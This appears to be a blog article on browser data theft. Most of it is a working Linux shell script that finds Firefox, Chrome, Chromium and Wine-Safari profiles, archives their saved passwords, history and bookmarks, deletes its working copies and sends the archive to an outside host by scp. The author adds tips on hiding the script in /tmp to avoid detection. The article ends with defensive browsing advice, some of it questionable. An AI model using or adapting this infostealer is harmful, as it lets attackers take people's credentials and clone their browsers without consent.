Stealing Web Browser Data

Scenario: You surf the internet on a regular basis. And you surf the web in various different locations. You feel relatively safe because your a Mac or Linux user so viruses are not very common for you. Then one day you realize all of the sites you visit have been compromised. So how is this done?

Chances are you downloaded a malicious file and executed it without knowing it was malicious. Or you visited a website that was designed to do drive by attacks. And when you visited it it downloaded the file and executed it without you even knowing about it.




But how is this file made. And what other information could this file have obtained about your computer. Below is a quick shell script written in about an 30 minutes that can obtain quite a bit of data.


#!/bin/sh
# check if firefox is installed
if dpkg -s "firefox" 2>/dev/null 1>/dev/null; then
# checks if firefox directory is where it is expected to be
if [ -d "$HOME/.mozilla" ]; then
# if firefox data is found copy it to a location to prepare to send it to the #server
cp -rf $HOME/.mozilla $HOME/virus/data/firefox;
# before sending it archive it
tar -cvf $HOME/virus/data/firefox.tar $HOME/virus/data/firefox;
gzip $HOME/virus/data/firefox.tar;
fi
fi
# checks if Google Chrome is installed
if dpkg -s "chrome" 2>/dev/null 1>/dev/null; then
#if chrome is installed check for user data
if [ -d "$HOME/.config/google-chrome" ]; then
cp -rf $HOME/.config/google-chrome $HOME/virus/data/chrome;
# before sending the data archive it
tar -cvf $HOME/virus/data/chrome.tar $HOME/virus/data/chrome;
gzip $HOME/virus/data/chrome.tar;
fi
fi
# checks if Chromium is installed.
if dpkg -s "chromium" 2>/dev/null 1>/dev/null; then
#if chromium is installed check for user data
if [ -d "$HOME/.config/chromium" ]; then
cp -rf $HOME/.config/chromium $HOME/virus/data/chromium;
# before sending the data archive it
tar -cvf $HOME/virus/chromium.tar $HOME/virus/data/chromium;
gzip $HOME/virus/data/chromium.tar;
fi
fi
# checks if wine is installed if it is the user may be running a windows #based web browser.
# in this case we are looking for the Apple Safari Web Browser for Windows #but we may want to copy all the Windows data
# this is just an example
if dpkg -s "wine" 2>/dev/null 1>/dev/null; then
if [ -d "$HOME/.wine/drive_c/Document and Settings/$USER/Application Data/Apple Computer/Safari" ]; then
cp -rf "$HOME/.wine/drive_c/Document and Settings/$USER/Application Data/Apple Computer/Safari" $HOME/virus/data/safari;
cp -rf "$HOME/.wine/drive_c/Document and Settings/$USER/Local Settings/Application Data/Apple Computer/Safari" $HOME/virus/data/safari1;
tar -cvf $HOME/virus/data/safari.tar $HOME/virus/data/safari;
tar -cvf $HOME/virus/data/safari1.tar $HOME/virus/data/safari1;
gzip $HOME/virus/data/safari.tar;
gzip $HOME/virus/data/safari1.tar;
fi
fi
tar -cvf $HOME/virus/data.tar $HOME/virus/data;
gzip $HOME/virus/data.tar;
# lets remove that junk data now that we have gzipped it all up
rm -rf $HOME/virus/data;
# ready to send that shits
if [ -f "$HOME/virus/data.tar.gz" ]; then
# in this example I'm using the secure copy command. But we can use SSH, FTP #or we can send it in an E-Mail attachment
# it is up to us. I'm using secure copy because it seems to be the prefered #method these days and seems to be on most
# modern Linux Systems
scp $HOME/virus/data.tar.gz user@domain.com/directory/;
fi

Script Explanation

As you can see the script is pretty basic. It pretty much uses programs that most *nix based systems ship with by default. And utilizes them to check what programs, files and directories are on the system. In this shell script it is only looking for browsers but it could be written to look for pretty much anything and have it sent to the attacker. For example it could look for bitcoin wallets and send them to the attacker.




Because this is just an example script it places everything in a location that is to obvious to the user. In a real world example it would store everything in the /tmp directory so it will get deleted when the user restarts the PC, leaving it completing undetected.

What the script does

However this very basic script which works on Ubuntu Linux and can be modified for any *nix system including Mac, is able to send the following data to the attacker.

  • FInds web browsers installed on the system. In this Ubuntu script version this is done with if dpkg -s “browser_name” 2>/dev/null 1>/dev/null; If we modified it for fedora it would be yum list installed “browser_name” 2>/dev/null 1>/dev/null; or rpm -qa "*package_name" 2>/dev/null 1>/dev/null;
  • If it finds a specific browser. For example if dpkg -s “firefox” 2>/dev/null 1>/dev/null is true then it uses another IF statement to locate the browsers data files. Since we know the default location for storing the files is /home/user/.mozilla on most Linux systems we look for that file. Since we don’t know what the users name is we use the environment variable $HOME for Linux systems. This brings us to /home/user regardless if it is /home/ben or /home/steve or anything else. Then if the script finds the directory it copies the directory to another directory. In the script shown it copies the files to a the $HOME/virus/data/firefox however in a real world script it would be more like the /tmp/data/firefox directory. It copies the files using the cp -rf $HOME/.mozilla $HOME/virus/data/firefox; The -rf switch is for recursive and to force the copy. Once it is copied over it then archives it using tar and gzip.
  • Finally it sends the archive to the attacker.

All of the files in these locations store the following information.

  • bookmarks
  • saved browser passwords
  • browsing history
  • preferences
  • plugins
  • addons

The only thing the attacker needs to do once he/she receives the files is to place them into the directory on his or her computer using the correct browser and he/she will pretty much have cloned your browser.




How to prevent this from happening?

The best thing you can do is to not go on websites you can’t trust. However that being said you may trust facebook, but people share links with you all the time on facebook. If you visit those links and those links are designed to act as a drive by download then your vulnerable so also don’t click on any links you don’t trust either.

It is also important to make sure you always have the latest version of your web browser and operating system. The latest version means ensures that patches to known security exploits have been patched and fixed.




Don’t bookmark anything. Unless you don’t care if some stranger obtains all of your bookmarks. You can always simply copy sites you want to remember onto a file on your flash drive.

Go into browser settings and configure it to not remember sites you have visited. This will clear your browsing history and your passwords every time you restart your browser.

Since many malicious sites use javascript exploits it is recommended to disable javascript for all sites, and only allow exceptions to certain sites to use javascript. If your using firefox this is ass easy as installing the noscript addon.

There are JAVA browser plugin exploits. Keep in mind JAVA is not Javascript. The best route to go is to not install the JAVA plugin onto your browser. This isn’t much of an issue since Oracle is now discontinuing the plugin all together.

There are also Flash and PDF exploits for web browsers. You can easily have flash and PDF installed on your computer without having the plugins for your browser. So if you need Flash or PDF feel free to use them but if your worried about such an attack make sure their plugins aren’t installed to your browser.




If you desperately need the Flash Plugin, you can install the image and flash blocker addon if your using firefox. This will allow you to easily toggle flash on and off, so when you do need to use it you can.

Block Ad Servers. Since Ad servers usually place cross domain code into a website it creates a chain of servers. And a chain is only as strong as it’s weakest link. You can block ad servers by adding an Ad Blocking addon to your browser or by modifying your hosts file.

It is also worth mentioning that when you have your browser setup in such a way you will notice it runs a lot faster. This is because all web pages have less content to load. There is no loading Javascript, or Java applets. And no loading of Flash or PDF elements. And since your not saving your browsing history or your passwords, you don’t have bunch of junk like cookies slowing you down. So your more then just safe your also faster.

But please keep in mind even though the above will greatly improve your safety online. The only full proof way to be certain you will be safe is to not use the internet.